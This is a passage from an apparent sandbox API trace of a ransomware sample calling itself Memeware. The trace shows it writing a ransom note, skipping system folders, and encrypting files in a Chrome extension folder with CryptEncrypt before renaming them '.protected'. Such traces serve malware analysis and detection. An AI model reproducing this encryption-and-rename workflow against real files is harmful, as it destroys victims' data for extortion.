(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.664] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0081.664] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.664] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0081.664] CloseHandle (hObject=0x158) returned 1 [0081.668] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Windows") returned -1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files") returned -1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files (x86)") returned -1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="$Recycle.bin") returned 1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="System Volume Information") returned -1 [0081.668] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 123 [0081.668] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2=".") returned 1 [0081.668] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="..") returned 1 [0081.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*") returned 125 [0081.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0081.669] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.669] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.669] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.669] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.669] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.669] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\.") returned 125 [0081.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.669] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.669] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\..") returned 126 [0081.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.670] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="Windows") returned -1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="Program Files") returned -1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="Program Files (x86)") returned -1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="$Recycle.bin") returned 1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="System Volume Information") returned -1 [0081.670] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned 138 [0081.670] lstrcmpW (lpString1="5817.313.0.5_0", lpString2=".") returned 1 [0081.670] lstrcmpW (lpString1="5817.313.0.5_0", lpString2="..") returned 1 [0081.670] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*") returned 140 [0081.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0081.672] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.672] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.672] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.672] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.672] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.672] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\.") returned 140 [0081.672] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.672] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.673] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.673] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.673] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.673] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.673] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.673] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\..") returned 141 [0081.673] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.673] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.673] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="Windows") returned -1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="Program Files") returned -1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="Program Files (x86)") returned -1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="$Recycle.bin") returned 1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="System Volume Information") returned -1 [0081.673] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.673] StrStrIW (lpFirst="angular.js", lpSrch=".protected") returned 0x0 [0081.673] lstrcmpW (lpString1="angular.js", lpString2="RESTORE_FILES.txt") returned -1 [0081.673] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0081.673] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0081.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.675] StrStrW (lpFirst="angular.js", lpSrch=".txt") returned 0x0 [0081.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.675] StrStrW (lpFirst="angular.js", lpSrch=".rar") returned 0x0 [0081.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.675] StrStrW (lpFirst="angular.js", lpSrch=".zip") returned 0x0 [0081.675] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.285] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.285] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.286] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.286] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.297] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.297] CloseHandle (hObject=0x160) returned 1 [0082.378] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.protected") returned 159 [0082.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.protected")) returned 1 [0082.379] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="Windows") returned -1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="Program Files") returned -1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="Program Files (x86)") returned -1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="$Recycle.bin") returned 1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="System Volume Information") returned -1 [0082.379] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.379] StrStrIW (lpFirst="background_script.js", lpSrch=".protected") returned 0x0 [0082.379] lstrcmpW (lpString1="background_script.js", lpString2="RESTORE_FILES.txt") returned -1 [0082.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.380] StrStrW (lpFirst="background_script.js", lpSrch=".txt") returned 0x0 [0082.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.380] StrStrW (lpFirst="background_script.js", lpSrch=".rar") returned 0x0 [0082.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.380] StrStrW (lpFirst="background_script.js", lpSrch=".zip") returned 0x0 [0082.380] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.414] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.415] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.415] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.415] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.416] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.416] CloseHandle (hObject=0x160) returned 1 [0082.416] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.protected") returned 169 [0082.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.protected")) returned 1 [0082.417] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="Windows") returned -1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="Program Files") returned -1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="Program Files (x86)") returned -1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="$Recycle.bin") returned 1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="System Volume Information") returned -1 [0082.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.417] StrStrIW (lpFirst="cast_game_sender.js", lpSrch=".protected") returned 0x0 [0082.417] lstrcmpW (lpString1="cast_game_sender.js", lpString2="RESTORE_FILES.txt") returned -1 [0082.417] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.417] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.418] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.418] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".txt") returned 0x0 [0082.418] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.418] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".rar") returned 0x0 [0082.418] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.418] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".zip") returned 0x0 [0082.418] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.423] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.423] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.424] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.424] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.541] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.541] CloseHandle (hObject=0x160) returned 1 [0082.541] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.protected") returned 168 [0082.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.protected")) returned 1 [0082.542] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="Windows") returned -1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="Program Files") returned -1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="Program Files (x86)") returned -1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="$Recycle.bin") returned 1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="System Volume Information") returned -1 [0082.542] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.542] StrStrIW (lpFirst="cast_route_details.html", lpSrch=".protected") returned 0x0 [0082.542] lstrcmpW (lpString1="cast_route_details.html", lpString2="RESTORE_FILES.txt") returned -1 [0082.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 